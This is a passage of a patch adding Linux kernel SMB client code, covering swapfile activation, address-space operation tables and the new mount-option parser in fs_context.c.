++	blocks = inode->i_blocks;
++	isize = inode->i_size;
++	spin_unlock(&inode->i_lock);
++	if (blocks*512 < isize) {
++		pr_warn("swap activate: swapfile has holes\n");
++		return -EINVAL;
++	}
++	*span = sis->pages;
++
++	pr_warn_once("Swap support over SMB3 is experimental\n");
++
++	/*
++	 * TODO: consider adding ACL (or documenting how) to prevent other
++	 * users (on this or other systems) from reading it
++	 */
++
++
++	/* TODO: add sk_set_memalloc(inet) or similar */
++
++	if (cfile)
++		cfile->swapfile = true;
++	/*
++	 * TODO: Since file already open, we can't open with DENY_ALL here
++	 * but we could add call to grab a byte range lock to prevent others
++	 * from reading or writing the file
++	 */
++
++	sis->flags |= SWP_FS_OPS;
++	return add_swap_extent(sis, 0, sis->max, 0);
++}
++
++static void cifs_swap_deactivate(struct file *file)
++{
++	struct cifsFileInfo *cfile = file->private_data;
++
++	cifs_dbg(FYI, "swap deactivate\n");
++
++	/* TODO: undo sk_set_memalloc(inet) will eventually be needed */
++
++	if (cfile)
++		cfile->swapfile = false;
++
++	/* do we need to unpin (or unlock) the file */
++}
++
++/*
++ * Mark a page as having been made dirty and thus needing writeback.  We also
++ * need to pin the cache object to write back to.
++ */
++#ifdef CONFIG_CIFS_FSCACHE
++static bool cifs_dirty_folio(struct address_space *mapping, struct folio *folio)
++{
++	return fscache_dirty_folio(mapping, folio,
++					cifs_inode_cookie(mapping->host));
++}
++#else
++#define cifs_dirty_folio filemap_dirty_folio
++#endif
++
++const struct address_space_operations cifs_addr_ops = {
++	.read_folio = cifs_read_folio,
++	.readahead = cifs_readahead,
++	.writepage = cifs_writepage,
++	.writepages = cifs_writepages,
++	.write_begin = cifs_write_begin,
++	.write_end = cifs_write_end,
++	.dirty_folio = cifs_dirty_folio,
++	.release_folio = cifs_release_folio,
++	.direct_IO = cifs_direct_io,
++	.invalidate_folio = cifs_invalidate_folio,
++	.launder_folio = cifs_launder_folio,
++	/*
++	 * TODO: investigate and if useful we could add an cifs_migratePage
++	 * helper (under an CONFIG_MIGRATION) in the future, and also
++	 * investigate and add an is_dirty_writeback helper if needed
++	 */
++	.swap_activate = cifs_swap_activate,
++	.swap_deactivate = cifs_swap_deactivate,
++};
++
++/*
++ * cifs_readahead requires the server to support a buffer large enough to
++ * contain the header plus one complete page of data.  Otherwise, we need
++ * to leave cifs_readahead out of the address space operations.
++ */
++const struct address_space_operations cifs_addr_ops_smallbuf = {
++	.read_folio = cifs_read_folio,
++	.writepage = cifs_writepage,
++	.writepages = cifs_writepages,
++	.write_begin = cifs_write_begin,
++	.write_end = cifs_write_end,
++	.dirty_folio = cifs_dirty_folio,
++	.release_folio = cifs_release_folio,
++	.invalidate_folio = cifs_invalidate_folio,
++	.launder_folio = cifs_launder_folio,
++};
+diff --git a/fs/smb/client/fs_context.c b/fs/smb/client/fs_context.c
+new file mode 100644
+index 0000000000000..e2e2ef0fa9a0f
+--- /dev/null
++++ b/fs/smb/client/fs_context.c
+@@ -0,0 +1,1773 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2020, Microsoft Corporation.
++ *
++ *   Author(s): Steve French <stfrench@microsoft.com>
++ *              David Howells <dhowells@redhat.com>
++ */
++
++/*
++#include <linux/module.h>
++#include <linux/nsproxy.h>
++#include <linux/slab.h>
++#include <linux/magic.h>
++#include <linux/security.h>
++#include <net/net_namespace.h>
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++*/
++
++#include <linux/ctype.h>
++#include <linux/fs_context.h>
++#include <linux/fs_parser.h>
++#include <linux/fs.h>
++#include <linux/mount.h>
++#include <linux/parser.h>
++#include <linux/utsname.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "ntlmssp.h"
++#include "nterr.h"
++#include "rfc1002pdu.h"
++#include "fs_context.h"
++
++static DEFINE_MUTEX(cifs_mount_mutex);
++
++static const match_table_t cifs_smb_version_tokens = {
++	{ Smb_1, SMB1_VERSION_STRING },
++	{ Smb_20, SMB20_VERSION_STRING},
++	{ Smb_21, SMB21_VERSION_STRING },
++	{ Smb_30, SMB30_VERSION_STRING },
++	{ Smb_302, SMB302_VERSION_STRING },
++	{ Smb_302, ALT_SMB302_VERSION_STRING },
++	{ Smb_311, SMB311_VERSION_STRING },
++	{ Smb_311, ALT_SMB311_VERSION_STRING },
++	{ Smb_3any, SMB3ANY_VERSION_STRING },
++	{ Smb_default, SMBDEFAULT_VERSION_STRING },
++	{ Smb_version_err, NULL }
++};
++
++static const match_table_t cifs_secflavor_tokens = {
++	{ Opt_sec_krb5, "krb5" },
++	{ Opt_sec_krb5i, "krb5i" },
++	{ Opt_sec_krb5p, "krb5p" },
++	{ Opt_sec_ntlmsspi, "ntlmsspi" },
++	{ Opt_sec_ntlmssp, "ntlmssp" },
++	{ Opt_sec_ntlmv2, "nontlm" },
++	{ Opt_sec_ntlmv2, "ntlmv2" },
++	{ Opt_sec_ntlmv2i, "ntlmv2i" },
++	{ Opt_sec_none, "none" },
++
++	{ Opt_sec_err, NULL }
++};
++
++const struct fs_parameter_spec smb3_fs_parameters[] = {
++	/* Mount options that take no arguments */
++	fsparam_flag_no("user_xattr", Opt_user_xattr),
++	fsparam_flag_no("forceuid", Opt_forceuid),
++	fsparam_flag_no("multichannel", Opt_multichannel),
++	fsparam_flag_no("forcegid", Opt_forcegid),
++	fsparam_flag("noblocksend", Opt_noblocksend),
++	fsparam_flag("noautotune", Opt_noautotune),
++	fsparam_flag("nolease", Opt_nolease),
++	fsparam_flag_no("hard", Opt_hard),
++	fsparam_flag_no("soft", Opt_soft),
++	fsparam_flag_no("perm", Opt_perm),
++	fsparam_flag("nodelete", Opt_nodelete),
++	fsparam_flag_no("mapposix", Opt_mapposix),
++	fsparam_flag("mapchars", Opt_mapchars),
++	fsparam_flag("nomapchars", Opt_nomapchars),
++	fsparam_flag_no("sfu", Opt_sfu),
++	fsparam_flag("nodfs", Opt_nodfs),
++	fsparam_flag_no("posixpaths", Opt_posixpaths),
++	fsparam_flag_no("unix", Opt_unix),
++	fsparam_flag_no("linux", Opt_unix),
++	fsparam_flag_no("posix", Opt_unix),
++	fsparam_flag("nocase", Opt_nocase),
++	fsparam_flag("ignorecase", Opt_nocase),
++	fsparam_flag_no("brl", Opt_brl),
++	fsparam_flag_no("handlecache", Opt_handlecache),
++	fsparam_flag("forcemandatorylock", Opt_forcemandatorylock),
++	fsparam_flag("forcemand", Opt_forcemandatorylock),
++	fsparam_flag("setuidfromacl", Opt_setuidfromacl),
++	fsparam_flag("idsfromsid", Opt_setuidfromacl),
++	fsparam_flag_no("setuids", Opt_setuids),
++	fsparam_flag_no("dynperm", Opt_dynperm),
++	fsparam_flag_no("intr", Opt_intr),
++	fsparam_flag_no("strictsync", Opt_strictsync),
++	fsparam_flag_no("serverino", Opt_serverino),
++	fsparam_flag("rwpidforward", Opt_rwpidforward),
++	fsparam_flag("cifsacl", Opt_cifsacl),
++	fsparam_flag_no("acl", Opt_acl),
++	fsparam_flag("locallease", Opt_locallease),
++	fsparam_flag("sign", Opt_sign),
++	fsparam_flag("ignore_signature", Opt_ignore_signature),
++	fsparam_flag("signloosely", Opt_ignore_signature),
++	fsparam_flag("seal", Opt_seal),
++	fsparam_flag("noac", Opt_noac),
++	fsparam_flag("fsc", Opt_fsc),
++	fsparam_flag("mfsymlinks", Opt_mfsymlinks),
++	fsparam_flag("multiuser", Opt_multiuser),
++	fsparam_flag("sloppy", Opt_sloppy),
++	fsparam_flag("nosharesock", Opt_nosharesock),
++	fsparam_flag_no("persistenthandles", Opt_persistent),
++	fsparam_flag_no("resilienthandles", Opt_resilient),
++	fsparam_flag_no("tcpnodelay", Opt_tcp_nodelay),
++	fsparam_flag("nosparse", Opt_nosparse),
++	fsparam_flag("domainauto", Opt_domainauto),
++	fsparam_flag("rdma", Opt_rdma),
++	fsparam_flag("modesid", Opt_modesid),
++	fsparam_flag("modefromsid", Opt_modesid),
++	fsparam_flag("rootfs", Opt_rootfs),
++	fsparam_flag("compress", Opt_compress),
++	fsparam_flag("witness", Opt_witness),
++
++	/* Mount options which take numeric value */
++	fsparam_u32("backupuid", Opt_backupuid),
++	fsparam_u32("backupgid", Opt_backupgid),
++	fsparam_u32("uid", Opt_uid),
++	fsparam_u32("cruid", Opt_cruid),
++	fsparam_u32("gid", Opt_gid),
++	fsparam_u32("file_mode", Opt_file_mode),
++	fsparam_u32("dirmode", Opt_dirmode),
++	fsparam_u32("dir_mode", Opt_dirmode),
++	fsparam_u32("port", Opt_port),
++	fsparam_u32("min_enc_offload", Opt_min_enc_offload),
++	fsparam_u32("esize", Opt_min_enc_offload),
++	fsparam_u32("bsize", Opt_blocksize),
++	fsparam_u32("rasize", Opt_rasize),
++	fsparam_u32("rsize", Opt_rsize),
++	fsparam_u32("wsize", Opt_wsize),
++	fsparam_u32("actimeo", Opt_actimeo),
++	fsparam_u32("acdirmax", Opt_acdirmax),
++	fsparam_u32("acregmax", Opt_acregmax),
++	fsparam_u32("closetimeo", Opt_closetimeo),
++	fsparam_u32("echo_interval", Opt_echo_interval),
++	fsparam_u32("max_credits", Opt_max_credits),
++	fsparam_u32("handletimeout", Opt_handletimeout),
++	fsparam_u64("snapshot", Opt_snapshot),
++	fsparam_u32("max_channels", Opt_max_channels),
++
++	/* Mount options which take string value */
++	fsparam_string("source", Opt_source),
++	fsparam_string("user", Opt_user),
++	fsparam_string("username", Opt_user),
++	fsparam_string("pass", Opt_pass),
++	fsparam_string("password", Opt_pass),
++	fsparam_string("ip", Opt_ip),
++	fsparam_string("addr", Opt_ip),
++	fsparam_string("domain", Opt_domain),
++	fsparam_string("dom", Opt_domain),
++	fsparam_string("srcaddr", Opt_srcaddr),
++	fsparam_string("iocharset", Opt_iocharset),
++	fsparam_string("netbiosname", Opt_netbiosname),
++	fsparam_string("servern", Opt_servern),
++	fsparam_string("ver", Opt_ver),
++	fsparam_string("vers", Opt_vers),
++	fsparam_string("sec", Opt_sec),
++	fsparam_string("cache", Opt_cache),
++
++	/* Arguments that should be ignored */
++	fsparam_flag("guest", Opt_ignore),
++	fsparam_flag("noatime", Opt_ignore),
++	fsparam_flag("relatime", Opt_ignore),
++	fsparam_flag("_netdev", Opt_ignore),
++	fsparam_flag_no("suid", Opt_ignore),
++	fsparam_flag_no("exec", Opt_ignore),
++	fsparam_flag_no("dev", Opt_ignore),
++	fsparam_flag_no("mand", Opt_ignore),
++	fsparam_flag_no("auto", Opt_ignore),
++	fsparam_string("cred", Opt_ignore),
++	fsparam_string("credentials", Opt_ignore),
++	/*
++	 * UNC and prefixpath is now extracted from Opt_source
++	 * in the new mount API so we can just ignore them going forward.
++	 */
++	fsparam_string("unc", Opt_ignore),
++	fsparam_string("prefixpath", Opt_ignore),
++	{}
++};
++
++static int
++cifs_parse_security_flavors(struct fs_context *fc, char *value, struct smb3_fs_context *ctx)
++{
++
++	substring_t args[MAX_OPT_ARGS];
++
++	/*
++	 * With mount options, the last one should win. Reset any existing
++	 * settings back to default.
++	 */
++	ctx->sectype = Unspecified;
++	ctx->sign = false;
++
++	switch (match_token(value, cifs_secflavor_tokens, args)) {
++	case Opt_sec_krb5p:
++		cifs_errorf(fc, "sec=krb5p is not supported!\n");
++		return 1;
++	case Opt_sec_krb5i:
++		ctx->sign = true;
++		fallthrough;
++	case Opt_sec_krb5:
++		ctx->sectype = Kerberos;
++		break;
++	case Opt_sec_ntlmsspi:
++		ctx->sign = true;
++		fallthrough;
++	case Opt_sec_ntlmssp:
++		ctx->sectype = RawNTLMSSP;
++		break;
++	case Opt_sec_ntlmv2i:
++		ctx->sign = true;
++		fallthrough;
++	case Opt_sec_ntlmv2:
++		ctx->sectype = NTLMv2;
++		break;
++	case Opt_sec_none:
++		ctx->nullauth = 1;
++		break;
++	default:
++		cifs_errorf(fc, "bad security option: %s\n", value);
++		return 1;
++	}
++
++	return 0;
++}
++
++static const match_table_t cifs_cacheflavor_tokens = {
++	{ Opt_cache_loose, "loose" },
++	{ Opt_cache_strict, "strict" },
++	{ Opt_cache_none, "none" },
++	{ Opt_cache_ro, "ro" },
++	{ Opt_cache_rw, "singleclient" },
++	{ Opt_cache_err, NULL }
++};
++
++static int
++cifs_parse_cache_flavor(struct fs_context *fc, char *value, struct smb3_fs_context *ctx)
++{
++	substring_t args[MAX_OPT_ARGS];
++
++	switch (match_token(value, cifs_cacheflavor_tokens, args)) {
++	case Opt_cache_loose:
++		ctx->direct_io = false;
++		ctx->strict_io = false;
++		ctx->cache_ro = false;
++		ctx->cache_rw = false;
++		break;
++	case Opt_cache_strict:
++		ctx->direct_io = false;
++		ctx->strict_io = true;
++		ctx->cache_ro = false;
++		ctx->cache_rw = false;
++		break;
++	case Opt_cache_none:
++		ctx->direct_io = true;
++		ctx->strict_io = false;
++		ctx->cache_ro = false;
++		ctx->cache_rw = false;
++		break;
++	case Opt_cache_ro:
++		ctx->direct_io = false;
++		ctx->strict_io = false;
++		ctx->cache_ro = true;
++		ctx->cache_rw = false;
++		break;
++	case Opt_cache_rw:
++		ctx->direct_io = false;
++		ctx->strict_io = false;
++		ctx->cache_ro = false;
++		ctx->cache_rw = true;
++		break;
++	default:
++		cifs_errorf(fc, "bad cache= option: %s\n", value);
++		return 1;
++	}
++	return 0;
++}
++
++#define DUP_CTX_STR(field)						\
++do {									\
++	if (ctx->field) {						\
++		new_ctx->field = kstrdup(ctx->field, GFP_ATOMIC);	\
++		if (new_ctx->field == NULL) {				\
++			smb3_cleanup_fs_context_contents(new_ctx);	\
++			return -ENOMEM;					\
++		}							\
++	}								\
++} while (0)
++
++int
++smb3_fs_context_dup(struct smb3_fs_context *new_ctx, struct smb3_fs_context *ctx)
++{
++	memcpy(new_ctx, ctx, sizeof(*ctx));
++	new_ctx->prepath = NULL;
++	new_ctx->mount_options = NULL;
++	new_ctx->nodename = NULL;
++	new_ctx->username = NULL;
++	new_ctx->password = NULL;
++	new_ctx->server_hostname = NULL;
++	new_ctx->domainname = NULL;
++	new_ctx->UNC = NULL;
++	new_ctx->source = NULL;
++	new_ctx->iocharset = NULL;
++	/*
++	 * Make sure to stay in sync with smb3_cleanup_fs_context_contents()
++	 */
++	DUP_CTX_STR(prepath);
++	DUP_CTX_STR(mount_options);
++	DUP_CTX_STR(username);
++	DUP_CTX_STR(password);
++	DUP_CTX_STR(server_hostname);
++	DUP_CTX_STR(UNC);
++	DUP_CTX_STR(source);
++	DUP_CTX_STR(domainname);
++	DUP_CTX_STR(nodename);
++	DUP_CTX_STR(iocharset);
++
++	return 0;
++}
++
++static int
++cifs_parse_smb_version(struct fs_context *fc, char *value, struct smb3_fs_context *ctx, bool is_smb3)
++{
++	substring_t args[MAX_OPT_ARGS];
++
++	switch (match_token(value, cifs_smb_version_tokens, args)) {
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	case Smb_1:
++		if (disable_legacy_dialects) {
++			cifs_errorf(fc, "mount with legacy dialect disabled\n");
++			return 1;
++		}
++		if (is_smb3) {
++			cifs_errorf(fc, "vers=1.0 (cifs) not permitted when mounting with smb3\n");
++			return 1;
++		}
++		cifs_errorf(fc, "Use of the less secure dialect vers=1.0 is not recommended unless required for access to very old servers\n");
++		ctx->ops = &smb1_operations;
++		ctx->vals = &smb1_values;
++		break;
++	case Smb_20:
++		if (disable_legacy_dialects) {
++			cifs_errorf(fc, "mount with legacy dialect disabled\n");
++			return 1;
++		}
++		if (is_smb3) {
++			cifs_errorf(fc, "vers=2.0 not permitted when mounting with smb3\n");
++			return 1;
++		}
++		ctx->ops = &smb20_operations;
++		ctx->vals = &smb20_values;
++		break;
++#else
++	case Smb_1:
++		cifs_errorf(fc, "vers=1.0 (cifs) mount not permitted when legacy dialects disabled\n");
++		return 1;
++	case Smb_20:
++		cifs_errorf(fc, "vers=2.0 mount not permitted when legacy dialects disabled\n");
++		return 1;
++#endif /* CIFS_ALLOW_INSECURE_LEGACY */
++	case Smb_21:
++		ctx->ops = &smb21_operations;
++		ctx->vals = &smb21_values;
++		break;
++	case Smb_30:
++		ctx->ops = &smb30_operations;
++		ctx->vals = &smb30_values;
++		break;
++	case Smb_302:
++		ctx->ops = &smb30_operations; /* currently identical with 3.0 */
++		ctx->vals = &smb302_values;
++		break;
++	case Smb_311:
++		ctx->ops = &smb311_operations;
++		ctx->vals = &smb311_values;
++		break;
++	case Smb_3any:
++		ctx->ops = &smb30_operations; /* currently identical with 3.0 */
++		ctx->vals = &smb3any_values;
++		break;
++	case Smb_default:
++		ctx->ops = &smb30_operations;
++		ctx->vals = &smbdefault_values;
++		break;
++	default:
++		cifs_errorf(fc, "Unknown vers= option specified: %s\n", value);
++		return 1;
++	}
++	return 0;
++}
++
++int smb3_parse_opt(const char *options, const char *key, char **val)
++{
++	int rc = -ENOENT;
++	char *opts, *orig, *p;
++
++	orig = opts = kstrdup(options, GFP_KERNEL);
++	if (!opts)
++		return -ENOMEM;
++
++	while ((p = strsep(&opts, ","))) {
++		char *nval;
++
++		if (!*p)
++			continue;
++		if (strncasecmp(p, key, strlen(key)))
++			continue;
++		nval = strchr(p, '=');
++		if (nval) {
++			if (nval == p)
++				continue;
++			*nval++ = 0;
++			*val = kstrdup(nval, GFP_KERNEL);
++			rc = !*val ? -ENOMEM : 0;
++			goto out;
++		}
++	}
++out:
++	kfree(orig);
++	return rc;
++}
++
++/*
++ * Remove duplicate path delimiters. Windows is supposed to do that
++ * but there are some bugs that prevent rename from working if there are
++ * multiple delimiters.
++ *
++ * Returns a sanitized duplicate of @path. @gfp indicates the GFP_* flags
++ * for kstrdup.
++ * The caller is responsible for freeing the original.
++ */
++#define IS_DELIM(c) ((c) == '/' || (c) == '\\')
++char *cifs_sanitize_prepath(char *prepath, gfp_t gfp)
++{
++	char *cursor1 = prepath, *cursor2 = prepath;
++
++	/* skip all prepended delimiters */
++	while (IS_DELIM(*cursor1))
++		cursor1++;
++
++	/* copy the first letter */
++	*cursor2 = *cursor1;
++
++	/* copy the remainder... */
++	while (*(cursor1++)) {
++		/* ... skipping all duplicated delimiters */
++		if (IS_DELIM(*cursor1) && IS_DELIM(*cursor2))
++			continue;
++		*(++cursor2) = *cursor1;
++	}
++
++	/* if the last character is a delimiter, skip it */
++	if (IS_DELIM(*(cursor2 - 1)))
++		cursor2--;
++
++	*(cursor2) = '\0';
++	return kstrdup(prepath, gfp);
++}
++
++/*
++ * Parse a devname into substrings and populate the ctx->UNC and ctx->prepath
++ * fields with the result. Returns 0 on success and an error otherwise
++ * (e.g. ENOMEM or EINVAL)
++ */
++int
++smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx)
++{
++	char *pos;
++	const char *delims = "/\\";
++	size_t len;
++
++	if (unlikely(!devname || !*devname)) {
++		cifs_dbg(VFS, "Device name not specified\n");
++		return -EINVAL;
++	}
++
++	/* make sure we have a valid UNC double delimiter prefix */
++	len = strspn(devname, delims);
++	if (len != 2)
++		return -EINVAL;
++
++	/* find delimiter between host and sharename */
++	pos = strpbrk(devname + 2, delims);
++	if (!pos)
++		return -EINVAL;
++
++	/* record the server hostname */
++	kfree(ctx->server_hostname);
++	ctx->server_hostname = kstrndup(devname + 2, pos - devname - 2, GFP_KERNEL);
++	if (!ctx->server_hostname)
++		return -ENOMEM;
++
++	/* skip past delimiter */
++	++pos;
++
++	/* now go until next delimiter or end of string */
++	len = strcspn(pos, delims);
++
++	/* move "pos" up to delimiter or NULL */
++	pos += len;
++	kfree(ctx->UNC);
++	ctx->UNC = kstrndup(devname, pos - devname, GFP_KERNEL);
++	if (!ctx->UNC)
++		return -ENOMEM;
++
++	convert_delimiter(ctx->UNC, '\\');
++
++	/* skip any delimiter */
++	if (*pos == '/' || *pos == '\\')
++		pos++;
++
++	kfree(ctx->prepath);
++	ctx->prepath = NULL;
++
++	/* If pos is NULL then no prepath */
++	if (!*pos)
++		return 0;
++
++	ctx->prepath = cifs_sanitize_prepath(pos, GFP_KERNEL);
++	if (!ctx->prepath)
++		return -ENOMEM;
++
++	return 0;
++}
++
++static void smb3_fs_context_free(struct fs_context *fc);
++static int smb3_fs_context_parse_param(struct fs_context *fc,
++				       struct fs_parameter *param);
++static int smb3_fs_context_parse_monolithic(struct fs_context *fc,
++					    void *data);
++static int smb3_get_tree(struct fs_context *fc);
++static int smb3_reconfigure(struct fs_context *fc);
++
++static const struct fs_context_operations smb3_fs_context_ops = {
++	.free			= smb3_fs_context_free,
++	.parse_param		= smb3_fs_context_parse_param,
++	.parse_monolithic	= smb3_fs_context_parse_monolithic,
++	.get_tree		= smb3_get_tree,
++	.reconfigure		= smb3_reconfigure,
++};
++
++/*
++ * Parse a monolithic block of data from sys_mount().
++ * smb3_fs_context_parse_monolithic - Parse key[=val][,key[=val]]* mount data
++ * @ctx: The superblock configuration to fill in.
++ * @data: The data to parse
++ *
++ * Parse a blob of data that's in key[=val][,key[=val]]* form.  This can be
++ * called from the ->monolithic_mount_data() fs_context operation.
++ *
++ * Returns 0 on success or the error returned by the ->parse_option() fs_context
++ * operation on failure.
++ */
++static int smb3_fs_context_parse_monolithic(struct fs_context *fc,
++					   void *data)
++{
++	struct smb3_fs_context *ctx = smb3_fc2context(fc);
++	char *options = data, *key;
++	int ret = 0;
++
++	if (!options)
++		return 0;
++
++	ctx->mount_options = kstrdup(data, GFP_KERNEL);
++	if (ctx->mount_options == NULL)
++		return -ENOMEM;
++
++	ret = security_sb_eat_lsm_opts(options, &fc->security);
++	if (ret)
++		return ret;
++
++	/* BB Need to add support for sep= here TBD */
++	while ((key = strsep(&options, ",")) != NULL) {
++		size_t len;
++		char *value;
++
++		if (*key == 0)
++			break;
++
++		/* Check if following character is the deliminator If yes,
++		 * we have encountered a double deliminator reset the NULL
++		 * character to the deliminator
++		 */
++		while (options && options[0] == ',') {
++			len = strlen(key);
++			strcpy(key + len, options);
++			options = strchr(options, ',');
++			if (options)
++				*options++ = 0;
++		}
++
++
++		len = 0;
++		value = strchr(key, '=');
++		if (value) {
++			if (value == key)
++				continue;
++			*value++ = 0;
++			len = strlen(value);
++		}
++
++		ret = vfs_parse_fs_string(fc, key, value, len);
++		if (ret < 0)
++			break;
++	}
++
++	return ret;
++}
++
++/*
++ * Validate the preparsed information in the config.
++ */
++static int smb3_fs_context_validate(struct fs_context *fc)
++{
++	struct smb3_fs_context *ctx = smb3_fc2context(fc);
++
++	if (ctx->rdma && ctx->vals->protocol_id < SMB30_PROT_ID) {
++		cifs_errorf(fc, "SMB Direct requires Version >=3.0\n");
++		return -EOPNOTSUPP;
++	}
++
++#ifndef CONFIG_KEYS
++	/* Muliuser mounts require CONFIG_KEYS support */
++	if (ctx->multiuser) {
++		cifs_errorf(fc, "Multiuser mounts require kernels with CONFIG_KEYS enabled\n");
++		return -1;
++	}
++#endif
++
++	if (ctx->got_version == false)
++		pr_warn_once("No dialect specified on mount. Default has changed to a more secure dialect, SMB2.1 or later (e.g. SMB3.1.1), from CIFS (SMB1). To use the less secure SMB1 dialect to access old servers which do not support SMB3.1.1 (or even SMB3 or SMB2.1) specify vers=1.0 on mount.\n");
++
++
++	if (!ctx->UNC) {
++		cifs_errorf(fc, "CIFS mount error: No usable UNC path provided in device string!\n");
++		return -1;
++	}
++
++	/* make sure UNC has a share name */
++	if (strlen(ctx->UNC) < 3 || !strchr(ctx->UNC + 3, '\\')) {
++		cifs_errorf(fc, "Malformed UNC. Unable to find share name.\n");
++		return -ENOENT;
++	}
++
++	if (!ctx->got_ip) {
++		int len;
++		const char *slash;
++
++		/* No ip= option specified? Try to get it from UNC */
++		/* Use the address part of the UNC. */
++		slash = strchr(&ctx->UNC[2], '\\');
++		len = slash - &ctx->UNC[2];
++		if (!cifs_convert_address((struct sockaddr *)&ctx->dstaddr,
++					  &ctx->UNC[2], len)) {
++			pr_err("Unable to determine destination address\n");
++			return -EHOSTUNREACH;
++		}
++	}
++
++	/* set the port that we got earlier */
++	cifs_set_port((struct sockaddr *)&ctx->dstaddr, ctx->port);
++
++	if (ctx->override_uid && !ctx->uid_specified) {
++		ctx->override_uid = 0;
++		pr_notice("ignoring forceuid mount option specified with no uid= option\n");
++	}
++
++	if (ctx->override_gid && !ctx->gid_specified) {
++		ctx->override_gid = 0;
++		pr_notice("ignoring forcegid mount option specified with no gid= option\n");
++	}
++
++	return 0;
++}
++
++static int smb3_get_tree_common(struct fs_context *fc)
++{
++	struct smb3_fs_context *ctx = smb3_fc2context(fc);
++	struct dentry *root;
++	int rc = 0;
++
++	root = cifs_smb3_do_mount(fc->fs_type, 0, ctx);
++	if (IS_ERR(root))
++		return PTR_ERR(root);
++
++	fc->root = root;
++
++	return rc;
++}
++
++/*
++ * Create an SMB3 superblock from the parameters passed.
++ */
++static int smb3_get_tree(struct fs_context *fc)
++{
++	int err = smb3_fs_context_validate(fc);
++	int ret;
++
++	if (err)
++		return err;
++	mutex_lock(&cifs_mount_mutex);
++	ret = smb3_get_tree_common(fc);
++	mutex_unlock(&cifs_mount_mutex);
++	return ret;
++}
++
++static void smb3_fs_context_free(struct fs_context *fc)
++{
++	struct smb3_fs_context *ctx = smb3_fc2context(fc);
++
++	smb3_cleanup_fs_context(ctx);
++}
++
++/*
++ * Compare the old and new proposed context during reconfigure
++ * and check if the changes are compatible.
++ */
++static int smb3_verify_reconfigure_ctx(struct fs_context *fc,
++				       struct smb3_fs_context *new_ctx,
++				       struct smb3_fs_context *old_ctx)
++{
++	if (new_ctx->posix_paths != old_ctx->posix_paths) {
++		cifs_errorf(fc, "can not change posixpaths during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->sectype != old_ctx->sectype) {
++		cifs_errorf(fc, "can not change sec during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->multiuser != old_ctx->multiuser) {
++		cifs_errorf(fc, "can not change multiuser during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->UNC &&
++	    (!old_ctx->UNC || strcmp(new_ctx->UNC, old_ctx->UNC))) {
++		cifs_errorf(fc, "can not change UNC during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->username &&
++	    (!old_ctx->username || strcmp(new_ctx->username, old_ctx->username))) {
++		cifs_errorf(fc, "can not change username during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->password &&
++	    (!old_ctx->password || strcmp(new_ctx->password, old_ctx->password))) {
++		cifs_errorf(fc, "can not change password during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->domainname &&
++	    (!old_ctx->domainname || strcmp(new_ctx->domainname, old_ctx->domainname))) {
++		cifs_errorf(fc, "can not change domainname during remount\n");
++		return -EINVAL;
++	}
++	if (strcmp(new_ctx->workstation_name, old_ctx->workstation_name)) {
++		cifs_errorf(fc, "can not change workstation_name during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->nodename &&
++	    (!old_ctx->nodename || strcmp(new_ctx->nodename, old_ctx->nodename))) {
++		cifs_errorf(fc, "can not change nodename during remount\n");
++		return -EINVAL;
++	}
++	if (new_ctx->iocharset &&
++	    (!old_ctx->iocharset || strcmp(new_ctx->iocharset, old_ctx->iocharset))) {
++		cifs_errorf(fc, "can not change iocharset during remount\n");
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++#define STEAL_STRING(cifs_sb, ctx, field)				\
++do {									\
++	kfree(ctx->field);						\
++	ctx->field = cifs_sb->ctx->field;				\
++	cifs_sb->ctx->field = NULL;					\
++} while (0)
++
++#define STEAL_STRING_SENSITIVE(cifs_sb, ctx, field)			\
++do {									\
++	kfree_sensitive(ctx->field);					\
++	ctx->field = cifs_sb->ctx->field;				\
++	cifs_sb->ctx->field = NULL;					\
++} while (0)
++
++static int smb3_reconfigure(struct fs_context *fc)
++{
++	struct smb3_fs_context *ctx = smb3_fc2context(fc);
++	struct dentry *root = fc->root;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(root->d_sb);
++	int rc;
++
++	rc = smb3_verify_reconfigure_ctx(fc, ctx, cifs_sb->ctx);
++	if (rc)
++		return rc;
++
++	/*
++	 * We can not change UNC/username/password/domainname/
++	 * workstation_name/nodename/iocharset
++	 * during reconnect so ignore what we have in the new context and
++	 * just use what we already have in cifs_sb->ctx.
++	 */
++	STEAL_STRING(cifs_sb, ctx, UNC);
++	STEAL_STRING(cifs_sb, ctx, source);
++	STEAL_STRING(cifs_sb, ctx, username);
++	STEAL_STRING_SENSITIVE(cifs_sb, ctx, password);
++	STEAL_STRING(cifs_sb, ctx, domainname);
++	STEAL_STRING(cifs_sb, ctx, nodename);
++	STEAL_STRING(cifs_sb, ctx, iocharset);
++
++	/* if rsize or wsize not passed in on remount, use previous values */
++	if (ctx->rsize == 0)
++		ctx->rsize = cifs_sb->ctx->rsize;
++	if (ctx->wsize == 0)
++		ctx->wsize = cifs_sb->ctx->wsize;
++
++
++	smb3_cleanup_fs_context_contents(cifs_sb->ctx);
++	rc = smb3_fs_context_dup(cifs_sb->ctx, ctx);
++	smb3_update_mnt_flags(cifs_sb);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	if (!rc)
++		rc = dfs_cache_remount_fs(cifs_sb);
++#endif
++
++	return rc;
++}
++
++static int smb3_fs_context_parse_param(struct fs_context *fc,
++				      struct fs_parameter *param)
++{
++	struct fs_parse_result result;
++	struct smb3_fs_context *ctx = smb3_fc2context(fc);
++	int i, opt;
++	bool is_smb3 = !strcmp(fc->fs_type->name, "smb3");
++	bool skip_parsing = false;
++	kuid_t uid;
++	kgid_t gid;
++
++	cifs_dbg(FYI, "CIFS: parsing cifs mount option '%s'\n", param->key);
++
++	/*
++	 * fs_parse can not handle string options with an empty value so
++	 * we will need special handling of them.
++	 */
